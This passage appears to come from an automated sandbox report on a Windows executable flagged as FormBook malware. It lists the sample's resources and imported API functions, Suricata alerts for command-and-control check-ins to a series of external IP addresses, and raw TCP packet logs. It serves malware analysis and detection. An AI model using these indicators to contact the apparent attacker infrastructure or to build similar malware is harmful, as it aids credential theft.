                                                                                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                  RT_RCDATA0xcf7b80x557cfdata1.000331278076531
                                                                                                                  RT_GROUP_ICON0x124f880x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                  RT_GROUP_ICON0x1250000x14dataEnglishGreat Britain1.25
                                                                                                                  RT_GROUP_ICON0x1250140x14dataEnglishGreat Britain1.15
                                                                                                                  RT_GROUP_ICON0x1250280x14dataEnglishGreat Britain1.25
                                                                                                                  RT_VERSION0x12503c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                  RT_MANIFEST0x1251180x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                  UxTheme.dllIsThemeActive
                                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishGreat Britain

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-02T15:23:39.782792+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549751202.92.5.2380TCP
                                                                                                                  2024-12-02T15:23:56.759707+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54979013.248.169.4880TCP
                                                                                                                  2024-12-02T15:23:59.548725+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54979713.248.169.4880TCP
                                                                                                                  2024-12-02T15:24:02.373348+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54980413.248.169.4880TCP
                                                                                                                  2024-12-02T15:24:05.071840+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54980913.248.169.4880TCP
                                                                                                                  2024-12-02T15:24:11.910522+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549825209.74.77.10980TCP
                                                                                                                  2024-12-02T15:24:14.605227+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549832209.74.77.10980TCP
                                                                                                                  2024-12-02T15:24:17.349205+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549839209.74.77.10980TCP
                                                                                                                  2024-12-02T15:24:20.056219+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549846209.74.77.10980TCP
                                                                                                                  2024-12-02T15:24:27.581133+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549863202.79.161.15180TCP
                                                                                                                  2024-12-02T15:24:30.299853+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549869202.79.161.15180TCP
                                                                                                                  2024-12-02T15:24:33.049846+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549875202.79.161.15180TCP
                                                                                                                  2024-12-02T15:24:35.928548+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549883202.79.161.15180TCP
                                                                                                                  2024-12-02T15:24:42.989311+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54989946.30.211.3880TCP
                                                                                                                  2024-12-02T15:24:45.641832+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54990546.30.211.3880TCP
                                                                                                                  2024-12-02T15:24:48.362326+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54991446.30.211.3880TCP
                                                                                                                  2024-12-02T15:24:50.989606+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54992046.30.211.3880TCP
                                                                                                                  2024-12-02T15:24:58.149770+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549936103.224.182.24280TCP
                                                                                                                  2024-12-02T15:25:00.822710+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549942103.224.182.24280TCP
                                                                                                                  2024-12-02T15:25:03.552588+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549948103.224.182.24280TCP
                                                                                                                  2024-12-02T15:25:06.141856+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549955103.224.182.24280TCP
                                                                                                                  2024-12-02T15:25:14.002988+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549972149.88.81.19080TCP
                                                                                                                  2024-12-02T15:25:16.675008+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549981149.88.81.19080TCP
                                                                                                                  2024-12-02T15:25:19.331148+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549987149.88.81.19080TCP
                                                                                                                  2024-12-02T15:25:22.080569+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549992149.88.81.19080TCP
                                                                                                                  2024-12-02T15:25:29.612576+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550001101.35.209.18380TCP
                                                                                                                  2024-12-02T15:25:32.284329+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550002101.35.209.18380TCP
                                                                                                                  2024-12-02T15:25:34.956723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550003101.35.209.18380TCP
                                                                                                                  2024-12-02T15:25:37.661755+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550004101.35.209.18380TCP
                                                                                                                  2024-12-02T15:25:44.862317+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000538.47.232.20280TCP
                                                                                                                  2024-12-02T15:25:47.536739+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000638.47.232.20280TCP
                                                                                                                  2024-12-02T15:25:50.206089+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000738.47.232.20280TCP
                                                                                                                  2024-12-02T15:25:53.002213+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000838.47.232.20280TCP
                                                                                                                  2024-12-02T15:26:00.206507+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550009208.91.197.3980TCP
                                                                                                                  2024-12-02T15:26:03.231207+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550010208.91.197.3980TCP
                                                                                                                  2024-12-02T15:26:05.592145+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011208.91.197.3980TCP
                                                                                                                  2024-12-02T15:26:08.807723+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550012208.91.197.3980TCP
                                                                                                                  2024-12-02T15:26:16.533640+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001343.205.198.2980TCP
                                                                                                                  2024-12-02T15:26:19.222695+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001443.205.198.2980TCP
                                                                                                                  2024-12-02T15:26:21.883704+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001543.205.198.2980TCP
                                                                                                                  2024-12-02T15:26:24.548736+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55001643.205.198.2980TCP
                                                                                                                  2024-12-02T15:26:31.596620+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550017172.67.187.11480TCP
                                                                                                                  2024-12-02T15:26:34.268653+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550018172.67.187.11480TCP
                                                                                                                  2024-12-02T15:26:36.940519+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550019172.67.187.11480TCP
                                                                                                                  2024-12-02T15:26:40.068178+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550020172.67.187.11480TCP
                                                                                                                  2024-12-02T15:26:47.190348+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550021172.67.167.14680TCP
                                                                                                                  2024-12-02T15:26:49.862196+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550022172.67.167.14680TCP
                                                                                                                  2024-12-02T15:26:52.524614+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550023172.67.167.14680TCP
                                                                                                                  2024-12-02T15:26:55.202013+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550024172.67.167.14680TCP
                                                                                                                  2024-12-02T15:27:02.582526+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002574.48.143.8280TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 2, 2024 15:23:37.995934963 CET4975180192.168.2.5202.92.5.23
                                                                                                                  Dec 2, 2024 15:23:38.115922928 CET8049751202.92.5.23192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:38.116024971 CET4975180192.168.2.5202.92.5.23
                                                                                                                  Dec 2, 2024 15:23:38.126090050 CET4975180192.168.2.5202.92.5.23
                                                                                                                  Dec 2, 2024 15:23:38.246201992 CET8049751202.92.5.23192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:39.782633066 CET8049751202.92.5.23192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:39.782644987 CET8049751202.92.5.23192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:39.782680988 CET8049751202.92.5.23192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:39.782792091 CET4975180192.168.2.5202.92.5.23
                                                                                                                  Dec 2, 2024 15:23:39.782838106 CET4975180192.168.2.5202.92.5.23
                                                                                                                  Dec 2, 2024 15:23:39.786046982 CET4975180192.168.2.5202.92.5.23
                                                                                                                  Dec 2, 2024 15:23:39.906059027 CET8049751202.92.5.23192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:55.492791891 CET4979080192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:55.613189936 CET804979013.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:55.613277912 CET4979080192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:55.627921104 CET4979080192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:55.747853994 CET804979013.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:56.759618998 CET804979013.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:56.759706974 CET4979080192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:57.144043922 CET4979080192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:57.264406919 CET804979013.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:58.162892103 CET4979780192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:58.351563931 CET804979713.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:58.351648092 CET4979780192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:58.367033005 CET4979780192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:58.594126940 CET804979713.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:59.545023918 CET804979713.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:23:59.548724890 CET4979780192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:59.878146887 CET4979780192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:23:59.998826027 CET804979713.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:00.908456087 CET4980480192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:01.221112013 CET804980413.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:01.221237898 CET4980480192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:01.235642910 CET4980480192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:01.356193066 CET804980413.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:01.356226921 CET804980413.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:02.373215914 CET804980413.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:02.373347998 CET4980480192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:02.737459898 CET4980480192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:02.858380079 CET804980413.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:03.842936039 CET4980980192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:03.962980986 CET804980913.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:03.963063002 CET4980980192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:03.972923994 CET4980980192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:04.092927933 CET804980913.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:05.071458101 CET804980913.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:05.071774006 CET804980913.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:05.071840048 CET4980980192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:05.074723005 CET4980980192.168.2.513.248.169.48
                                                                                                                  Dec 2, 2024 15:24:05.196667910 CET804980913.248.169.48192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:10.519582987 CET4982580192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:10.639457941 CET8049825209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:10.639544010 CET4982580192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:10.680368900 CET4982580192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:10.800338984 CET8049825209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:11.910187960 CET8049825209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:11.910459995 CET8049825209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:11.910521984 CET4982580192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:12.190613985 CET4982580192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:13.212898016 CET4983280192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:13.332909107 CET8049832209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:13.333024979 CET4983280192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:13.418637037 CET4983280192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:13.538788080 CET8049832209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:14.605081081 CET8049832209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:14.605153084 CET8049832209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:14.605226994 CET4983280192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:14.925013065 CET4983280192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:15.944175959 CET4983980192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:16.064193964 CET8049839209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:16.064279079 CET4983980192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:16.083868027 CET4983980192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:16.203866959 CET8049839209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:16.203948975 CET8049839209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:17.348841906 CET8049839209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:17.349107027 CET8049839209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:17.349205017 CET4983980192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:17.597001076 CET4983980192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:18.616226912 CET4984680192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:18.736205101 CET8049846209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:18.736310959 CET4984680192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:18.745285034 CET4984680192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:18.865295887 CET8049846209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:20.056024075 CET8049846209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:20.056060076 CET8049846209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:20.056219101 CET4984680192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:20.059303045 CET4984680192.168.2.5209.74.77.109
                                                                                                                  Dec 2, 2024 15:24:20.179681063 CET8049846209.74.77.109192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:26.032694101 CET4986380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:26.152792931 CET8049863202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:26.152932882 CET4986380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:26.166685104 CET4986380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:26.286664963 CET8049863202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:27.531204939 CET8049863202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:27.581132889 CET4986380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:27.674957037 CET4986380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:27.736965895 CET8049863202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:27.737031937 CET4986380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:28.709409952 CET4986980192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:28.829411030 CET8049869202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:28.829509974 CET4986980192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:28.848989010 CET4986980192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:28.968919992 CET8049869202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:30.245717049 CET8049869202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:30.299853086 CET4986980192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:30.362483025 CET4986980192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:30.457093954 CET8049869202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:30.457187891 CET4986980192.168.2.5202.79.161.151
